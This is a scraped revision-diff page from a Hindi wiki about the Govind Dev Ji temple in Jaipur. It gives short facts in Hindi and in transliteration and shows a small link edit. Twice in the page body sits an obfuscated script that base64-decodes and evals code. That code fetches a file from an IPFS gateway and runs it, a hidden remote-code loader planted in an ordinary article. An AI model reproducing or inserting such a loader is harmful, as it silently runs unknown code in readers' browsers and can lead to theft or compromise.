Difference between revisions of "गोविंद देवजी का मंदिर जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
*भगवान [[कृष्ण]] का [[जयपुर]] का सबसे प्रसिद्ध बिना शिखर का मंदिर है।  
 
*भगवान [[कृष्ण]] का [[जयपुर]] का सबसे प्रसिद्ध बिना शिखर का मंदिर है।  
 
*यह चन्द्र महल के पूर्व में बने जन निवास बगीचे के मध्य अहाते में स्थित है।  
 
*यह चन्द्र महल के पूर्व में बने जन निवास बगीचे के मध्य अहाते में स्थित है।  
*संरक्षक देवता गोविंदजी की मूर्ति पहले [[वृंदावन]] के मंदिर में स्थापित थी जिसको सवाई जयसिंह द्वितीय ने अपने परिवार के [[देवता]] के रूप में यहाँ पुनः स्थापित किया था।
+
*संरक्षक देवता गोविंदजी की मूर्ति पहले [[वृंदावन]] के मंदिर में स्थापित थी जिसको [[जयसिंह द्वितीय|सवाई जयसिंह द्वितीय]] ने अपने परिवार के [[देवता]] के रूप में यहाँ पुनः स्थापित किया था।
 
{{इन्हेंभीदेखें|गोविन्द देव मन्दिर वृन्दावन}}
 
{{इन्हेंभीदेखें|गोविन्द देव मन्दिर वृन्दावन}}
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 05:28, 23 December 2011

400px|thumb|goviand dev ji ka mandir ka drishy
View of Govind Dev Temple

  • bhagavan krishna ka jayapur ka sabase prasiddh bina shikhar ka mandir hai.
  • yah chandr mahal ke poorv mean bane jan nivas bagiche ke madhy ahate mean sthit hai.
  • sanrakshak devata goviandaji ki moorti pahale vriandavan ke mandir mean sthapit thi jisako savaee jayasianh dvitiy ne apane parivar ke devata ke roop mean yahaan punah sthapit kiya tha.
  1. REDIRECTsaancha:inhean bhi dekhean

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>